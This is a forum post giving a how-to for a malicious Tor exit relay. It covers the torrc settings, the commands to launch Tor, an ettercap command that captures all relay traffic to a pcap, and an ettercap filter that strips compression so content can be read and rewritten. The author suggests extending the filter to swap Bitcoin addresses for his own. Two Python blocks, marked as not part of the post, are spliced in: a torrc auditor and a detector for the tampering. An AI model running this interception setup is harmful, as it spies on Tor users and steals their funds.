Tor MiTM Relay

  • Thread starter XMAN
  • Start date Sep 17, 2021
XMAN

  • Sep 17, 2021
  • #1
Tor MiTM Relay 09-09-2020, 06:12 PM #1
So in light of recent events I thought I'd show you a quick way to set up a Tor MiTM Relay. This was done on Debian Buster (10.5).

Let's install Tor (you can get the latest packages by adding the Tor repo to your /apt/sources.list):
Code:
apt update
apt install tor

When those packages have finished installing, Tor will automatically start running, so let's stop that:
Code:
systemctl stop tor

Now remove the default Tor config:
Code:
rm /etc/tor/torrc

Now create a new torrc file and paste the following:
Code:
touch /etc/tor/torrc
Code:
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D # DO NOT USE THIS PASSWORD!
Nickname YOURRELAYNAME # CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1

Remember to change the HashedControlPassword with the output of the following, and the Nickname with whatever you want:
Code:
tor --hash-password YOURPASSWORD
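As an added example (not part of the post), here is a relay operator's self-check in Python that parses a torrc like the one above and reports what the policy actually does: Tor applies ExitPolicy lines in order, the first match wins, and its built-in default policy is consulted last, so `reject *:82-6500` never decides ports 82-444 here because the earlier accept line already did. It also flags a HashedControlPassword copied verbatim from this public post and a SOCKSPort bound to a non-loopback address. The parser, the finding strings and the embedded copy of the torrc (with the notes turned into `#` comments so tor would parse it) are this example's own; the default-policy port list is the one documented in the tor(1) manual.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Copy of the relay configuration from the post above, notes turned into
# '#' comments; used here as constructed sample input.
SAMPLE_TORRC = """\
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050
ExitPolicy accept *:80-444
ExitPolicy reject *:82-6500
ControlPort 9051
HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D # DO NOT USE THIS PASSWORD!
Nickname YOURRELAYNAME # CHANGE ME
ORPort 9001
SocksListenAddress 127.0.0.1
"""

# This hash is published in the post, so a relay still carrying it has copied
# the example instead of generating its own with 'tor --hash-password'.
PUBLISHED_EXAMPLE_HASH = "16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D"

# Tor's built-in default exit policy, appended after the configured lines
# (port list as documented in the tor(1) manual).
DEFAULT_EXIT_POLICY = [
    "reject *:25", "reject *:119", "reject *:135-139", "reject *:445",
    "reject *:563", "reject *:1214", "reject *:4661-4666",
    "reject *:6346-6429", "reject *:6699", "reject *:6881-6999", "accept *:*",
]


@dataclass
class Rule:
    action: str   # "accept" or "reject"
    host: str     # only "*" is handled by this audit
    lo: int
    hi: int

    def __str__(self) -> str:
        if (self.lo, self.hi) == (1, 65535):
            ports = "*"
        else:
            ports = str(self.lo) if self.lo == self.hi else f"{self.lo}-{self.hi}"
        return f"{self.action} {self.host}:{ports}"


def parse_torrc(text: str) -> List[Tuple[str, str]]:
    """Return (key, value) pairs; blank lines and '#' comments are dropped."""
    pairs = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            key, _, value = line.partition(" ")
            pairs.append((key, value.strip()))
    return pairs


def parse_rule(value: str) -> Rule:
    """Parse 'accept *:80-444' style policy text into a Rule."""
    action, _, target = value.partition(" ")
    host, _, ports = target.rpartition(":")
    if ports == "*":
        lo, hi = 1, 65535
    elif "-" in ports:
        lo, hi = (int(p) for p in ports.split("-", 1))
    else:
        lo = hi = int(ports)
    return Rule(action.lower(), host, lo, hi)


def exit_allowed(rules: List[Rule], port: int) -> bool:
    """First matching line wins; the default policy is consulted last."""
    for rule in rules + [parse_rule(v) for v in DEFAULT_EXIT_POLICY]:
        if rule.lo <= port <= rule.hi:
            return rule.action == "accept"
    return False  # unreachable: the default policy ends with 'accept *:*'


def audit(torrc: str) -> Dict[str, object]:
    """Collect the policy lines and a list of human-readable findings."""
    pairs = parse_torrc(torrc)
    rules = [parse_rule(v) for k, v in pairs if k == "ExitPolicy"]
    findings: List[str] = []

    # A line is shadowed wherever an earlier line already decided those ports.
    covered = bytearray(65536)
    for rule in rules:
        shadowed = [p for p in range(rule.lo, rule.hi + 1) if covered[p]]
        if shadowed and len(shadowed) == rule.hi - rule.lo + 1:
            findings.append(f"'{rule}' never matches: fully shadowed by earlier lines")
        elif shadowed:
            findings.append(f"'{rule}' does not apply to ports {shadowed[0]}-{shadowed[-1]}: "
                            "earlier lines decide them first")
        for p in range(rule.lo, rule.hi + 1):
            covered[p] = 1

    for key, value in pairs:
        if key == "HashedControlPassword" and value == PUBLISHED_EXAMPLE_HASH:
            findings.append("HashedControlPassword is the value published in the post; "
                            "generate your own with 'tor --hash-password'")
        if key == "SOCKSPort" and ":" in value and not value.startswith("127."):
            findings.append(f"SOCKSPort {value} listens on a non-loopback address: "
                            "the proxy is reachable from the network")
    return {"rules": rules, "findings": findings}


if __name__ == "__main__":
    report = audit(SAMPLE_TORRC)
    for port in (80, 443, 4000, 25, 8080):
        print(f"port {port}: exit {'allowed' if exit_allowed(report['rules'], port) else 'refused'}")
    for finding in report["findings"]:
        print("finding:", finding)
```

Running it against the post's torrc shows 443 exiting (first line accepts 80-444), 4000 refused, 25 refused by the default policy and 8080 allowed by it, plus the three findings: the shadowed reject line, the reused hash and the LAN-facing SOCKSPort.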

Now we are ready to run Tor. If you have kept your torrc file under /etc/tor/torrc, this will be the default config. Now run the following (not as root!):
Code:
tor -f /etc/tor/torrc

Wait until Tor finishes connecting and open a new root terminal. Now it's time to install ettercap (you could probably use another tool if you wanted):
Code:
apt install ettercap

Now our relay is up and running, so how do we start sniffing the traffic? With one simple command:
Code:
ettercap -T -w dump.pcap -E -i wlp2s0

This is now a Tor relay which is sniffing all the traffic going through it; you could probably add a filter to modify traffic on the fly. (I'm currently trying to get this working with a regex; if anyone has any ideas about this then send me a PM. I've already got the filter ready, it just needs a little tweaking.) The filter for replacing text is below. Adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address with yours (in theory).

Code:
##
#  This filter will replace certain words in TCP packet
#  requests before forwarding the packet back to the target host.
#  Based on code from ALoR, NaGA & Morpheus
##

##########################
## Zap Content Encoding ##
##########################
# change target request to server
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");
    msg("[test] |_ packet Accept-Encoding zapped ✔\n");
  }
}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  msg("[test] host:127.0.0.1   [ <- ]  port:80 http ☆");
  if (search(DATA.data, "gzip")) {
    replace("gzip", "    "); # note: four spaces in the replacement string
  }
}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {
  if (search(DATA.data, "deflate")) {
    replace("deflate", "       "); # note: seven spaces in the replacement string
  }
}

#####################
## Replace Content ##
#####################
# change server response to target
if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.src == 80) {
  if (search(DATA.data, "hello")){
    replace("hello", "hello");
    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");
    msg("[test] | status : string found in tcp packet ✔");
    msg("[test] |_info   : packet forward back to target ✔\n");
  }
}
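The filter above leaves a recognisable trace: it overwrites the header name in place with a same-length string and overwrites each coding token with a same-length run of spaces, so the request keeps its size but arrives with a header that no browser would send. As an added example (not part of the post), here is a small Python detector that a monitoring proxy or IDS rule author could run over captured requests to spot that rewriting: a renamed Accept-Encoding header, coding tokens blanked with spaces, or an Accept-Encoding header that no longer lists any coding at all. The parser, the finding strings and the three sample requests are constructed for this example.

```python
import re
from typing import List, Tuple

# Signature of the "zap content encoding" filter above: the header name is
# overwritten in place (same length), and each coding token is overwritten
# with a same-length run of spaces.
ZAP_HEADER_NAME = "accept-rubbish!"
BLANKED_TOKEN = re.compile(r"(^|,)\s{4,}(,|$)")   # 4+ spaces where a token should be
CODING_TOKEN = re.compile(r"^[A-Za-z0-9*][A-Za-z0-9+\-.]*(\s*;\s*q=[0-9.]+)?$")


def parse_request(raw: bytes) -> Tuple[str, List[Tuple[str, str]]]:
    """Split an HTTP/1.x request head into its request line and raw header pairs.
    Header values are kept unstripped on purpose: the padding is the evidence."""
    head = raw.decode("latin-1").partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name, value))
    return lines[0], headers


def analyze_request(raw: bytes) -> List[str]:
    """Return findings that point at in-path rewriting of the encoding header."""
    findings: List[str] = []
    _, headers = parse_request(raw)
    for name, value in headers:
        clean_name = name.strip()
        lname = clean_name.lower()
        if lname == ZAP_HEADER_NAME:
            findings.append(f"header name rewritten in place: {clean_name!r}")
        if lname in (ZAP_HEADER_NAME, "accept-encoding"):
            codings = [c.strip() for c in value.split(",")]
            if BLANKED_TOKEN.search(value):
                findings.append(f"{clean_name}: coding token overwritten with spaces")
            elif any(c and not CODING_TOKEN.match(c) for c in codings):
                findings.append(f"{clean_name}: malformed coding token {value.strip()!r}")
            if not any(codings):
                findings.append(f"{clean_name}: no content-coding left; "
                                "compression disabled on the wire")
    return findings


def is_tampered(raw: bytes) -> bool:
    """True when any finding was raised for the request."""
    return bool(analyze_request(raw))


# Constructed samples: a clean request, the same request after the filter ran
# (name renamed, 'gzip' and 'deflate' blanked), and a request where only the
# tokens were blanked but the header name survived.
CLEAN = (b"GET / HTTP/1.1\r\nHost: example.com\r\n"
         b"Accept-Encoding: gzip, deflate\r\n\r\n")
ZAPPED = (b"GET / HTTP/1.1\r\nHost: example.com\r\n"
          b"Accept-Rubbish!:     ,        \r\n\r\n")
PARTIAL = (b"GET / HTTP/1.1\r\nHost: example.com\r\n"
           b"Accept-Encoding: identity,        \r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("zapped", ZAPPED), ("partial", PARTIAL)):
        print(label, analyze_request(sample) or "no findings")
```

The clean request yields no findings; the fully zapped one yields three (renamed header, blanked tokens, no coding left) and the partially blanked one yields one. Because the rewrite is length-preserving, a byte-count comparison between client and server would not catch it, which is why the check looks at header syntax rather than packet size.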
 